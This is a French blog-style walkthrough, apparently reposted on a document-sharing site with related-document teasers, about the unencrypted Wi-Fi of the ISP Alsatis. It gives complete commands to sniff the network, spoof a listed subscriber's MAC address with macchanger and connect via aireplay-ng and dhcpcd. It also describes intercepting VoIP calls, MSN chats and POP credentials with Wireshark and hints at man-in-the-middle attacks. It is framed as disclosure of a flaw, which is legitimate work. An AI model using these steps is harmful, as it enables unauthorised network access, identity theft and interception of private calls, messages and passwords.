«Petit Problème» de sécurité sur le réseau Wifi Alsatis...
|
|
- Pascale Rochette
- il y a 8 ans
- Total affichages :
Transcription
1 «Petit Problème» de sécurité sur le réseau Wifi Alsatis... Matériel utilisé : adaptateur usb wifi alfa awus036h Logiciel utilisé : système d exploitation Linux distribution Backtrack et Wireshark. Une présentation de la société Alsatis est présente sur : En résumé, Alsatis représente un total de 6000 abonnés sur 500 communes... Toutes les démonstrations suivantes sont connues de tous les amateurs éclairés bidouillants avec la technologie Wifi. Il ne faut pas se méprendre, je ne fais pas partie du monde des Hackers, ou autre génie de l informatique : je cherche simplement à comprendre le «pourquoi du comment» de certaines choses... Le système d exploitation utilisé est Linux avec Backtrack comme distribution puisqu il contient déjà beaucoup d utilitaires conçus pour l analyse réseau. Toute la démonstration est tout à fait adaptable sous Windows puisque la plupart des logiciels utilisés ont leurs équivalence. L adaptateur wifi alfa awus036h sera donc reconnu en «wlan0» Mettons la carte wifi en mode «monitor» pour écouter l état du réseau Alsatis : bt ~ # iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan b/g Mode:Managed Channel=11 Access Point: Not-Associated Bit Rate=11 Mb/s Tx-Power=5 dbm Retry:on Fragment thr:off Encryption key:off Link Quality=6/100 Signal level=-240 dbm Noise level=-162 dbm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 bt ~ # airmon-ng start wlan0 Interface Chipset Driver wlan0 RTL8187 r8187 (monitor mode enabled) bt ~ # iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan b/g Mode:Monitor Channel=10 Bit Rate=11 Mb/s Tx-Power=5 dbm Retry:on Fragment thr:off Link Quality:6/100 Signal level:-240 dbm Noise level:-162 dbm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 Lançons le logiciel d écoute du réseau «airodump». Le relais Alsatis fonctionne uniquement sur le canal Wifi n 01.
2 Nous pouvons observer que dans la colonne ENC (encryption), le sigle OPN indique que le réseau est en clair (OPEN) : autrement dit, il n y a pas de cryptage des données circulant sur le réseau Wifi Alsatis. C est une aberration puisque de nos jours même la connexion Wifi d un particulier entre sa Box (Freebox, Neufbox...) et son pc est cryptée par défaut (WEP, WPA...). bt ~ # airodump-ng wlan0 -c 01 CH 1 ][ Elapsed: 3 mins ][ :28 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E 00:0C:42:05:91:FF OPN a BSSID STATION PWR Rate Lost Packets Probe 00:0C:42:05:91:FF 00:16:01:AF:49:0B :0C:42:05:91:FF 00:80:48:64:86:5E alsatis 00:0C:42:05:91:FF 00:80:48:57:E0:7A :0C:42:05:91:FF 00:80:48:65:40:2A alsatis 00:0C:42:05:91:FF 00:15:6D:EE:28:E alsatis 00:0C:42:05:91:FF 00:80:48:54:75:BC :0C:42:05:91:FF 00:80:48:55:91: :0C:42:05:91:FF 00:80:48:57:E0:E :0C:42:05:91:FF 00:16:01:AE:27:E :0C:42:05:91:FF 00:16:01:AF:2A: :0C:42:05:91:FF 00:80:48:54:74:6C :0C:42:05:91:FF 00:15:6D:EE:D3:6E :0C:42:05:91:FF 00:80:48:5E:F3: :0C:42:05:91:FF 00:80:48:54:77: :0C:42:05:91:FF 00:16:01:AD:B2: Comment le relais Wifi Alsatis 00:0C:42:05:91:FF peut il donc faire pour reconnaître les abonnés habilités à se connecter à Internet. Le réseau étant OPEN, la solution est le filtrage par adresse MAC. L adresse MAC est un identifiant mis en place physiquement par les constructeurs dans l électronique même des cartes réseaux, modem... Elle est donc en principe inchangeable (d ou l intérêt du filtrage des adresses MAC pour la connexion au réseau Alsatis). Le modem-routeur envoyé à chaque abonné par Alsatis placé sur le toit (pour établir la connexion Wifi) possède donc une adresse MAC d identification unique. Le problème est qu il existe des logiciels tel que «macchanger» pour changer virtuellement une adresse MAC... A partir de là, nous pouvons prendre virtuellement n importe quelle adresse MAC afin de leurrer le filtrage du réseau Alsatis pour se connecter à Internet. Ci dessous les commandes pour changer l adresse MAC de l adaptateur Wifi par l adresse Mac 00 :16 :01 :AF :2A :31 (repérer plus haut comme client Alsatis grâce au logiciel «airodump». bt ~ # ifconfig wlan0 down bt ~ # macchanger wlan0 -m 00:16:01:AF:2A:31 Current MAC: 00:c0:ca:23:ad:60 (Alfa, Inc.) Faked MAC: 00:16:01:AF:2A:31 (unknown) bt ~ # ifconfig wlan0 up bt ~ # iwconfig
3 lo eth0 no wireless extensions. no wireless extensions. wlan b/g Mode:Monitor Channel=1 Bit Rate=11 Mb/s Tx-Power=5 dbm Retry:on Fragment thr:off Link Quality=93/100 Signal level=-212 dbm Noise level=-249 dbm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 bt ~ # ifconfig lo Link encap:local Loopback inet addr: Mask: UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b) wlan0 Link encap:unspec HWaddr AF-2A UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1500 Metric:1 RX packets:3328 errors:5 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes: (344.3 KiB) TX bytes:0 (0.0 b) Nous allons ensuite utiliser le logiciel «Aireplay» afin de lancer une connexion au relais Alsatis 00:0c:42:05:91:ff avec notre nouvelle adresse MAC 00:16:01:AF:2A:31. bt ~ # aireplay-ng e alsatis -a 00:0c:42:05:91:ff -h 00:16:01:AF:2A:31 wlan0 21:51:31 Waiting for beacon frame (BSSID: 00:0C:42:05:91:FF) on channel 1 21:51:31 Sending Authentication Request (Open System) 21:51:33 Sending Authentication Request (Open System) 21:51:35 Sending Authentication Request (Open System) 21:51:37 Sending Authentication Request (Open System) 21:51:40 Sending Authentication Request (Open System) 21:51:43 Sending Authentication Request (Open System) 21:51:46 Sending Authentication Request (Open System) 21:51:48 Sending Authentication Request (Open System) 21:51:50 Sending Authentication Request (Open System) 21:51:52 Sending Authentication Request (Open System) 21:51:55 Sending Authentication Request (Open System) 21:51:55 Authentication successful 21:51:55 Sending Association Request 21:51:55 Association successful :-) (AID: 1) 21:52:00 Sending Authentication Request (Open System)
4 21:52:00 Authentication successful 21:52:00 Sending Association Request 21:52:00 Association successful :-) (AID: 1) 21:52:05 Sending Authentication Request (Open System) 21:52:07 Sending Authentication Request (Open System) 21:52:09 Sending Authentication Request (Open System) 21:52:09 Authentication successful 21:52:09 Sending Association Request 21:52:14 Sending Authentication Request (Open System) 21:52:14 Authentication successful 21:52:14 Sending Association Request 21:52:14 Association successful :-) (AID: 1) Nous sommes donc connectées au relais Alsatis. Passons l adaptateur Wifi en mode «Manager» pour établir une connexion Internet. bt ~ # iwconfig wlan0 mode manager bt ~ # iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan b/g Mode:Managed Channel=1 Access Point: Not-Associated Bit Rate=11 Mb/s Tx-Power=5 dbm Retry:on Fragment thr:off Encryption key:off Link Quality=0/100 Signal level=-238 dbm Noise level=-156 dbm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 Lançons la configuration de la connexion à Internet. bt ~ # iwconfig wlan0 ap 00:0c:42:05:91:ff bt ~ # iwconfig wlan0 essid alsatis Lançons la connexion bt ~ # dhcpcd wlan0 Grâce au «ping» suivant, nous avons la confirmation que nous sommes connectées à Internet (Firefox fonctionne). Pour Alsatis, nous sommes l abonné 00:16:01:AF:2A:31 bt ~ # ping PING ( ) 56(84) bytes of data. 64 bytes from ww-in-f99.1e100.net ( ): icmp_seq=3 ttl=49 time=314 ms ping statistics packets transmitted, 1 received, 83% packet loss, time 9600ms rtt min/avg/max/mdev = / / /0.000 ms Au delà de la gratuité, cette connexion «sauvage» pose le problème de l usurpation d identité sur un réseau Wifi, fâcheux en cas de téléchargement illégal (Hadopi), cybercrime, spam mailing... Comme vous le voyez, la manipulation est à la porter d un enfant!
5 Mais, il y a plus grave : Puisque le flux de données sur le réseau Alsatis n est pas cryptée, il peut être observer par un logiciel analyseur du flux réseau tel que «wireshark». Alsatis étant à la pointe de la technologie, la société propose à ses abonnés la possibilité de téléphoner gratuitement et de manière illimité en passant leurs communication par Internet grâce à un petit boîtier Linksys PAP2T (La société Keyyo semble être le prestataire de ce service de téléphonie ip). Les communications téléphoniques apparaissent alors sous forme de packet ayant comme protocole réseau SIP et RTP. Ci dessous après filtrage, ils apparaissent ainsi : Il va donc être possible grâce à la manipulation ci dessous d enregistrer la conversation téléphonique en clair...
6
7 Il est aussi possible d écouter directement la conversation téléphonique interceptée...
8
9
10 Dans le même registre, il est possible d intercepter les conversations de messagerie «Chat» de type MSN. Ci dessous la copie d écran après avoir filtrer le protocole MSNMS correspondant au dialogue sur MSN. Nous pouvons lire le texte envoyé, l expéditeur, le destinataire...
11 De même avec les mails : en filtrant le protocole «POP», il est possible d intercepter les mails relevés tout en capturant les mots de passe (PASS) et identifiants (USER) de la personne...
12 Au sujet des échanges sécurisés, il est à noter que le protocole TLSV1 (SSL) utilisé pour les sites sécurisés avec https est efficace. Par sniffing, aucune donnée n est lisible (n CB). Mais avec des méthodes plus sophistiquées (et si la cible accepte un faux certificats SSL) alors ce protocole devient obsolète.
13 Il faut préciser que l interception de données peut être automatiser par des logiciels tel que Mailsnarf, Urlsnarf, Dsniff et Ettercap. Ces interceptions sont d autant plus menaçantes que des services de l Etat tel que des mairies, des collectivités territoriales, des gendarmeries utilisent le réseau Alsatis. Une grande partie de l identification sur Internet est basée sur un ensemble «mot de passe/identifiant». Si vous oubliez votre mot de passe pour vous connecter à votre compte (banque, messagerie, forum, site e-commerce), votre nouveau mot de passe vous est très souvent renvoyé par mail... Vous comprendrez donc que ces interceptions sont dangereuses! De plus, ce défaut de sécurité permet aussi de rendre une attaque de type «man in the middle» MITM avec injection de fausses données et redirection de l ensemble du flux Internet de manière non visible pour les utilisateurs très efficaces... Ce sera peut être l objet d une autre démonstration? ;@) Margaux de la Valière
14
Connexion à un réseau local: Configuration et dépannage
Connexion à un réseau local: Configuration et dépannage Configurer et Dépanner Ethernet Configuration de l'interface Unix Configuration Automatique Lorsque le réseau possède un serveur DHCP, il devient
Plus en détailRéseau - VirtualBox. Sommaire
Réseau - VirtualBox 2015 tv - v.1.0 - produit le 10 mars 2015 Sommaire Le réseau virtuel 2 Introduction.............................................. 2 Modes réseaux............................................
Plus en détailConfiguration réseau Basique
Configuration réseau Basique 1. Configuration réseau bas niveau Les outils de configuration réseau bas niveau traditionnels des systèmes GNU/Linux sont les programmes ifconfig et route qui viennent dans
Plus en détailTP SECU NAT ARS IRT 2010 2011 ( CORRECTION )
TP SECU NAT ARS IRT 2010 2011 ( CORRECTION ) Présentation du TP le firewall sera une machine virtuelle sous Devil Linux le firewall a deux cartes réseaux eth0 ( interface externe ) et eth1 (interface interne)
Plus en détailConfigurer sa carte Wi-Fi sous BSD
Configurer sa carte Wi-Fi sous BSD Introduction Détection de la carte Lister les réseaux disponibles Configuration Ad-Hoc sans WEP Configuration Ad-Hoc avec WEP Configuration Infrastructure sans WEP Configuration
Plus en détailSi vous avez des questions ou bien si vous voulez tout simplement vous détendre, faite un tour sur le forum.
Wifiway : tests de sécurité réseau http://www.wifiway.fr/ 2 sur 3 26/03/2010 01:11 Les modems wifi sont de plus en plus courants. Le wifi présente de nombreux avantages (pas de câble, facilité pour créer
Plus en détail7.3 : Ce qu IPv6 peut faire pour moi
7.3 : Ce qu IPv6 peut faire pour moi Qu y a-t-il dans mon PC? Qu y a-t-il dans ma CrétinBox? Qu y a-t-il dans un routeur ipv6 ready? 2014 Eric Levy-Abégnoli (Cisco) Stéphane Frati (Unice) On a tout vu
Plus en détailSécurité des réseaux wi fi
Sécurité des réseaux wi fi, drocourt@iut-amiens.fr IUT Amiens, Département Informatique 1 Mode Ad Hoc 2 Mode Infrastructure AP (Access Point) 3 Mode Infrastructure AP (Access Point) 4 Mode Infrastructure
Plus en détailLa sécurité dans un réseau Wi-Fi
La sécurité dans un réseau Wi-Fi Par Valérian CASTEL. Sommaire - Introduction : Le Wi-Fi, c est quoi? - Réseau ad hoc, réseau infrastructure, quelles différences? - Cryptage WEP - Cryptage WPA, WPA2 -
Plus en détailComprendre le Wi Fi. Patrick VINCENT pvincent@erasme.org
Comprendre le Wi Fi Patrick VINCENT pvincent@erasme.org Le standard 802.11 Débit théorique maximum 802.11b 802.11a 802.11g 11 Mbps 54 Mbps 54 Mbps Bande de fréquence Portée maximale Observations intérieur
Plus en détailTutorial Aircrack-ng backtrack Test de votre réseau wifi par crack de clef wep
Annonces Google Antenne WiFi Aircrack WEP Tutorial Live Tuto Live Accueil Tuto A venir Vidéos Forum Chat irc View it in english Tutorial Aircrack-ng backtrack Test de votre réseau wifi par crack de clef
Plus en détailAnnée Universitaire 2010-2011 session 1 d automne Parcours : CSB5 Licence 3 STS Informatique
Année Universitaire 2010-2011 session 1 d automne Parcours : CSB5 Licence 3 STS Informatique UE : INF157 Épreuve : Examen Utilisation des réseaux Date : 13 décembre 2010 Heure : 8h30 Durée : 1h30 Modalités
Plus en détailLes clés d un réseau privé virtuel (VPN) fonctionnel
Les clés d un réseau privé virtuel (VPN) fonctionnel À quoi sert un «VPN»? Un «VPN» est, par définition, un réseau privé et sécurisé qui évolue dans un milieu incertain. Ce réseau permet de relier des
Plus en détailWiFI Sécurité et nouvelles normes
WiFI Sécurité et nouvelles normes FRNOG 25 septembre 2003 cleclerc@xpconseil.com Agenda DEVOTEAM Group La soupe à l alphabet et acronymes du 802.11 Normes Les services securité WEP, EAP, TKIP Exploitation
Plus en détailCapture, Filtrage et Analyse de trames ETHERNET avec le logiciel Wireshark. Etape 1 : Lancement des machines virtuelles VMWARE et de Wireshark
Capture, Filtrage et Analyse de trames ETHERNET avec le logiciel Wireshark Wireshark est un programme informatique libre de droit, qui permet de capturer et d analyser les trames d information qui transitent
Plus en détailCONFIGURATION DE OPENVPN AVEC CLIENT FEDORA ET CLIENT WINDOWS. Distribution : Fedora 14 Noyau GNU/Linux :2.6.35 Version document : 1
CONFIGURATION DE OPENVPN AVEC CLIENT FEDORA ET CLIENT WINDOWS Distribution : Fedora 14 Noyau GNU/Linux :2.6.35 Version document : 1 Auteur : Le Cabellec Anthony 12 Décembre 2010 Table des matières 1 Présentation...3
Plus en détailTester la se curite de son re seau WiFi
Tester la se curite de son re seau WiFi Par Clément JOATHON Dernière mise à jour : 03/08/2015 Alors que pour s introduire sur un réseau filaire, il faut s y relier physiquement, en WiFi, toute personne
Plus en détailVoIP Sniffing IHSEN BEN SALAH (GL 3) MAHMOUD MAHDI (GL 3) MARIEM JBELI (RT 2) SAFA GALLAH (RT 3) SALAH KHEMIRI (RT 3) YOUSSEF BEN DHIAF (GL 3)
VoIP Sniffing IHSEN BEN SALAH (GL 3) MAHMOUD MAHDI (GL 3) MARIEM JBELI (RT 2) SAFA GALLAH (RT 3) SALAH KHEMIRI (RT 3) YOUSSEF BEN DHIAF (GL 3) Table des matières: 1. Présentation de l atelier... 2 2. Présentation
Plus en détailInternet. Licence Pro R&S. TD 5 - Wifi / Radius. 1 Sur le réseau de distribution (DS) 1.1 Configuration des routeurs PC6
Département des Sciences Informatiques Licence Pro R&S 2009 2010 Chiffrement et authentification T.T. Dang Ngoc dntt@u-cergy.fr TD 5 - Wifi / Radius Vous déployerez la salle en IPv4 de la manière suivante
Plus en détail2.4GHz IEEE 802.11g 54Mbps Wireless LAN PCIbus Adapter GW-DS54GT. Planex Communications Inc.
2.4GHz IEEE 802.11g 54Mbps Wireless LAN PCIbus Adapter GW-DS54GT Planex Communications Inc. Table des matières 1. INTRODUCTION... 3 1.1 Description... 3 1.2 Contenu de la boîte... 3 1.3 Options de réseau
Plus en détailCorrigé du TP 6 Réseaux
Corrigé du TP 6 Réseaux Interrogations DNS et auto-configuration par DHCP C. Pain-Barre INFO - IUT Aix-en-Provence version du 5/4/2013 1 Noms de stations et de domaine 1.1 Noms officieux 1.1.1 Sous Unix
Plus en détailArticles sur le thème "Sécurité" http://thegeekcorner.free.fr
Articles sur le thème "Sécurité" Sommaire TUTORIEL Installation et configuration de Xplico sous Backtrack I-Pré-requis...p. II-Installation et configuration...p. a) Installation de Xplico... p. b) Configuration
Plus en détailProjet 8INF206 : Sécurité réseau informatique Attaque de l homme du milieu (MITM) Guillaume Pillot
Projet 8INF206 : Sécurité réseau informatique Attaque de l homme du milieu (MITM) Guillaume Pillot 11 Juin 2012 Sommaire Introduction 3 1 Systèmes d exploitation,matériel et logiciel 4 1.1 Machine Benny.......................................
Plus en détailAdministration du WG302 en SSH par Magicsam
Administration du WG302 en SSH par Magicsam Le Point d'accès WG302 comprend une interface sécurisée de commande en ligne Telnet. Deux possibilités pour administrer le WG302 en SSH : via le port série situé
Plus en détailDIGITAL NETWORK. Le Idle Host Scan
DIGITAL NETWORK Siège : 13 chemin de Fardeloup 13600 La Ciotat Siret : 43425494200015 APE : 722 Z www.digital network.org www.dnsi.info Laboratoires : 120 Avenue du Marin Blanc, ZI Les Paluds, 13685 Aubagne
Plus en détailLes réseaux : les principes Comment ça marche?
Module RX : les réseaux Les réseaux : les principes Comment ça marche? Généralités TCP/IP Fabrice Harrouet École Nationale d Ingénieurs de Brest harrouet@enib.fr http://www.enib.fr/~harrouet/ enib, F.H...
Plus en détailL'écoute des conversations VoIP
L'écoute des conversations VoIP Marc-André Meloche (OSCP, C EH, Security+) et Eric Gingras 5 à 7 Technique 21 Septembre 2010 Gardien Virtuel Entreprise de services-conseils spécialisée dans la sécurité
Plus en détailConfiguration d un firewall pour sécuriser un serveur WEB
Configuration d un firewall pour sécuriser un serveur WEB Contexte : Dans le cadre de la mise en place d un serveur intranet, il est demandé de sécuriser son accès et de le personnaliser en fonction de
Plus en détailALLARD 3ème année Christophe Licence informatique RAPPORT DE STAGE. Association Tetaneutral.net. Stage du 15 avril au 7 juin
ALLARD 3ème année Christophe Licence informatique RAPPORT DE STAGE Association Tetaneutral.net Stage du 15 avril au 7 juin 2012 / 2013 1 2 Remerciements Je tiens à remercier M. Laurent GUERBY de m'avoir
Plus en détailLes commandes relatives aux réseaux
SHELL Les commandes relatives aux réseaux L'accès aux ou via les réseaux est devenu vital, aussi, les commandes traditionnelles de connexion et de transfert de fichiers ont été remplacées par des commandes
Plus en détailFACULTE DES SCIENCES ET TECHNIQUES FES SAIS MASTER SYSTEMES INTELLIGENTS ET RESEAUX MST SIR 2014 TP WIFI. Encadré par PR.
FACULTE DES SCIENCES ET TECHNIQUES FES SAIS MASTER SYSTEMES INTELLIGENTS ET RESEAUX MST SIR 2014 TP WIFI Encadré par PR.AHLAM BEGEDOURI Abdelhamid El hassani Mohamed Ouddaf Nacer Harti Yahya kharban Hatim
Plus en détailWIFI (WIreless FIdelity)
WIFI (WIreless FIdelity) 1. Théorie et architectures 2. Démarche d un déploiement (WLAN Bluesocket/Cisco) 3. Maquettage Ph. Tourron 1 PLAN Théorie et architecture Les types de réseaux sans fil Normes autour
Plus en détailSécurité des réseaux sans fil
Sécurité des réseaux sans fil Matthieu Herrb CNRS-LAAS matthieu.herrb@laas.fr Septembre 2003 SIARS Toulouse 2003 Plan La technologie sans fils Faiblesses et Attaques Architecture Sécurisation des postes
Plus en détailTP 6 : Wifi Sécurité
TP 6 : Wifi Sécurité Ce TP fait appel à plusieurs outils logiciels et documents, la plupart d'entre eux sont déjà installés avec l'icône sur le bureau. Dans le cas contraire, vérifiez que le programme
Plus en détailSécurité des réseaux wifi. CREIX Kevin GIOVARESCO Julien
Sécurité des réseaux wifi Sécurité des réseaux wifi CREIX Kevin GIOVARESCO Julien Sécurité des réseaux wifi Introduction Introduction Wi-Fi = Wireless Fidelity (gage d'intéropérabilité) 1997 -> norme 802.11
Plus en détailHow To? Sécurité des réseaux sans fils
Retrouvez les meilleurs prix informatiques How To? Sécurité des réseaux sans fils Notre magasin Rue Albert 1er, 7 B-6810 Pin - Chiny Route Arlon - Florenville (/fax: 061/32.00.15 FORMATIONS Le MAGASIN
Plus en détailL3 informatique Réseaux : Configuration d une interface réseau
L3 informatique Réseaux : Configuration d une interface réseau Sovanna Tan Septembre 2009 Révision septembre 2012 1/23 Sovanna Tan Configuration d une interface réseau Plan 1 Introduction aux réseaux 2
Plus en détailCahier des charges. driver WIFI pour chipset Ralink RT2571W. sur hardware ARM7
Cahier des charges driver WIFI pour chipset Ralink RT2571W sur hardware ARM7 RevA 13/03/2006 Création du document Sylvain Huet RevB 16/03/2006 Fusion des fonctions ARP et IP. SH Modification des milestones
Plus en détail7.1.2 Normes des réseaux locaux sans fil
Chapitre 7 7.1.2 Normes des réseaux locaux sans fil Quelles sont les deux conditions qui poussent à préférer la norme 802.11g à la norme 802.11a? (Choisissez deux réponses.) La portée de la norme 802.11a
Plus en détailPrésenté par : Ould Mohamed Lamine Ousmane Diouf
Sécurité des Réseaux Wi Fi Présenté par : Ould Mohamed Lamine Ousmane Diouf Table des matières Présentation du réseau Wi Fi Configuration d'un réseau Wi Fi Risques liés aux réseaux Wi Fi Règles de base
Plus en détailChapitre 2 Machines virtuelles et services
Chapitre 2 Machines virtuelles et services 1. Introduction Machines virtuelles et services Le Proxmox étant installé, nous allons nous atteler à créer différentes machines virtuelles telles que présentées
Plus en détailAugmenter la portée de votre WiFi avec un répéteur
Augmenter la portée de votre WiFi avec un répéteur Vous utilisez le réseau sans fil Wifi de votre box pour vous connecter à Internet mais vous avez du mal à capter le signal à certains endroits de votre
Plus en détailMONNIER Marie 10807915 2008/2009 WPA
WPA RESUME Je vais étudier dans ce projet WPA (WPA et WPA2, en particulier la version personal la plus utilisée, mais aussi la version enterprise utilisant un serveur d authentification de type radius
Plus en détailSAGEM Wi-Fi 11g USB ADAPTER Guide de mise en route rapide pour Mac OS X
SAGEM Wi-Fi 11g USB ADAPTER Guide de mise en route rapide pour Mac OS X But de ce guide Ce guide décrit la méthode d'installation et de configuration de votre SAGEM Wi-Fi 11g USB ADAPTER pour réseau sans
Plus en détailNoureddine BOUHADDAOUI Adrien GOSSEAUME Mustapha MOURI Julien VEHENT
Noureddine BOUHADDAOUI Adrien GOSSEAUME Mustapha MOURI Julien VEHENT Architecture Wifi sécurisée sous Cisco Master Management de la Sécurité des Systèmes Industriels et des Systèmes d'information Mars
Plus en détailALOHA LOAD BALANCER BONDING ACTIF-PASSIF
ALOHA LOAD BALANCER BONDING ACTIF-PASSIF «APPNOTES» #0005 CONFIGURATION DU BONDING ACTIF-PASSIF Cette note applicative a pour vocation de vous aider à configurer le bonding pour assurer la haute disponibilité
Plus en détailFILTRAGE de PAQUETS NetFilter
TP RESEAUX MMI Semestre 3 FILTRAGE de PAQUETS NetFilter OBJECTIF : Introduction à Netfilter. Configuration d'un firewall. MATERIELS : (Machines Virtuelles) 1 Serveur Debian avec apache d'installé, 1 Poste
Plus en détailPACK ADSL WIFI. Configurer ma connexion ADSL avec Modem/Routeur Sagem F@st 1400W
PACK ADSL WIFI Configurer ma connexion ADSL avec Modem/Routeur Sagem F@st 1400W Installation du Pack Wi-Fi : Vous devez Installer votre clé Wi-Fi avant d installer votre modem/routeur a. Installation de
Plus en détailPoussés par cette relative simplicité d'installation. Cassons le cryptage WPA, sécurisons le WiFi
Cassons le cryptage WPA, sécurisons le Régis Senet La démocratisation des appareils (Wireless Fidelity) a grandement simplifié le déploiement des petits réseaux professionnels et domestiques. Grâce à cette
Plus en détailSécurité des réseaux Les attaques
Sécurité des réseaux Les attaques A. Guermouche A. Guermouche Cours 2 : Les attaques 1 Plan 1. Les attaques? 2. Quelques cas concrets DNS : Failles & dangers 3. honeypot A. Guermouche Cours 2 : Les attaques
Plus en détailSecurity Exposed. #1 - Take the red pill. An introduction to hacking & security flaws. ... and follow the white rabbit
Security Exposed #1 - Take the red pill... and follow the white rabbit An introduction to hacking & security flaws 1 Copyright 2010 Thireus. All Rights Reserved. 1 Sur les traces d un pirate Objectifs
Plus en détailProcédure Configuration Borne Wifi. Attribution d'une adresse IP
Procédure Configuration Borne Wifi Attribution d'une adresse IP Le matériel utilisé durant ce projet fut une borne Wifi Cisco Aironet 1142 (AIR- AP1142N-E-K9), le logiciel qui se nomme TeraTerm pour accéder
Plus en détailL identité numérique. Risques, protection
L identité numérique Risques, protection Plan Communication sur l Internet Identités Traces Protection des informations Communication numérique Messages Chaque caractère d un message «texte» est codé sur
Plus en détailInternet Protocol. «La couche IP du réseau Internet»
Internet Protocol «La couche IP du réseau Internet» Rôle de la couche IP Emission d un paquet sur le réseau Réception d un paquet depuis le réseau Configuration IP par l administrateur Noyau IP Performance
Plus en détailIntroduction à l'analyse réseau Philippe Latu philippe.latu(at)linux-france.org
Philippe Latu philippe.latu(at)linux-france.org http://www.linux-france.org/prj/inetdoc/ Historique des versions $Revision: 12 $ $Date: 2004/12/09 16:24:42 $ PL Année universitaire 2004-2005 Table des
Plus en détailManuel de Configuration
Manuel de Configuration Point d accès 802.11b/g www.legrand.fr Introduction Si votre installation comporte plusieurs Points d accès WiFi Legrand à configurer, veillez à les paramétrer individuellement.
Plus en détailDIFF AVANCÉE. Samy. samy@via.ecp.fr
DIFF AVANCÉE Samy samy@via.ecp.fr I. RETOUR SUR QUELQUES PROTOCOLES COUCHE FONCTIONS Protocoles 7 Application 6 Présentation 5 Session 4 Transport 3 Réseau 2 Liaison 1 Physique Interface entre l utilisateur
Plus en détailIV. La sécurité du sans-fil
IV. La sécurité du sans-fil Le Wi-Fi est un vrai défis et une vraie révolution. Le développement de ces outils à été plus vite que l apparition des normes, il en découle de sérieux problèmes de base. Nul
Plus en détailCharte d installation des réseaux sans-fils à l INSA de Lyon
Charte d installation des réseaux sans-fils à l INSA de Lyon Toute installation d un point d accès est soumise à autorisation auprès du Responsable Sécurité des Systèmes d Information (RSSI) de l INSA
Plus en détailConfiguration de routeur D-Link Par G225
Configuration de routeur D-Link Par G225 Modèle : DIR-625 et DIR-628 Adresse du routeur par le navigateur internet : http://192.168.0.1/ Changer le mot de passe utilisateur du routeur Sans fil L'accès
Plus en détailSécurité d IPv6. Sécurité d IPv6. Stéphane Bortzmeyer AFNIC bortzmeyer@nic.fr. Stéphane Bortzmeyer AFNIC bortzmeyer@nic.fr
Sécurité d IPv6 Stéphane Bortzmeyer AFNIC bortzmeyer@nic.fr 1 / 24 Sécurité d IPv6 Stéphane Bortzmeyer AFNIC bortzmeyer@nic.fr 2 / 24 Introduction IPv6 est la version d IP normalisée en 1995-1998 (RFC
Plus en détail1 PfSense 1. Qu est-ce que c est
1 PfSense 1 Qu est-ce que c est une distribution basée sur FreeBSD ; un fournisseur de services : serveur de temps : NTPD ; relais DNS ; serveur DHCP ; portail captif de connexion ; un routeur entre un
Plus en détailServeur de messagerie sous Debian 5.0
Serveur de messagerie sous Debian 5.0 Avec Postfix et une connexion sécurisée GEORGET DAMIEN ET ANTHONY DIJOUX 06/10/2009 [Tutorial d installation d un serveur de messagerie POP et SMTP sous Debian, avec
Plus en détailGuide Installation de Fully Automated NAGIOS 2.3 sur Hyper-V
Guide Installation de Fully Automated NAGIOS 2.3 sur Hyper-V Ce document est fourni sous licence CC-by. Document rédigé le 4 août 2012 par Xavier Chotard. Vous pouvez me retrouver sur mon Blog : maniatux.fr
Plus en détailVirtual Private Network WAFA GHARBI (RT4) CYRINE MAATOUG (RT4) BOCHRA DARGHOUTH (RT4) SALAH KHEMIRI (RT4) MARWA CHAIEB (RT3) WIEM BADREDDINE (RT3)
Virtual Private Network WAFA GHARBI (RT4) CYRINE MAATOUG (RT4) BOCHRA DARGHOUTH (RT4) SALAH KHEMIRI (RT4) MARWA CHAIEB (RT3) WIEM BADREDDINE (RT3) Table des matières 1. Présentation de l atelier 2 1.1.
Plus en détailSécurité Nouveau firmware & Nouvelles fonctionnalités
Sécurité Nouveau firmware & Nouvelles fonctionnalités Sécurité ZyXEL - gamme USG Un choix complet de produits pour les petits comme les grands! Une gamme de 9 produits Firewall Services UTM Répartition
Plus en détail1. Warm up Activity: Single Node
TP - Netkit Netkit ( http://wiki.netkit.org/index.php/main_page ), un logiciel Open-Source, permet d'émuler les réseaux, avec une très grand partie de protocoles TCP/IP. Il est basé sur uml (user-mode
Plus en détailOutils libres d'audit et d'intrusion pour les réseaux Wi-Fi
HERVÉ SCHAUER CONSULTANTS Cabinet de Consultants en Sécurité Informatique depuis 1989 Spécialisé sur Unix, Windows, TCP/IP et Internet Solution Linux Paris 2006 Mardi 31 janvier 2006 Outils libres d'audit
Plus en détailPeyre-Brosson Clothilde Tutoriel configuration Borne Wifi D-Link DWL-2000AP TUTORIEL CONFIGURATION BORNE WIFI D- LINK DWL-2000AP
TUTORIEL CONFIGURATION BORNE WIFI D- LINK DWL-2000AP 1 Table des matières Les prérequis :... 3 Introduction... 3 La configuration... 4 Firmware... 4 Mot de passe administrateur... 5 Le SSID... 6 Le Canal...
Plus en détailAdministration Système
1/66 Administration Système Thierry Hamon Bureau H202 - Institut Galilée Tél. : 33 1.48.38.35.53 Bureau 150 LIM&BIO EA 3969 Université Paris 13 - UFR Léonard de Vinci 74, rue Marcel Cachin, F-93017 Bobigny
Plus en détailCe document décrit une solution de single sign-on (SSO) sécurisée permettant d accéder à Microsoft Exchange avec des tablettes ou smartphones.
PERSPECTIVES Le Single Sign-On mobile vers Microsoft Exchange avec OWA et ActiveSync Ce document décrit une solution de single sign-on (SSO) sécurisée permettant d accéder à Microsoft Exchange avec des
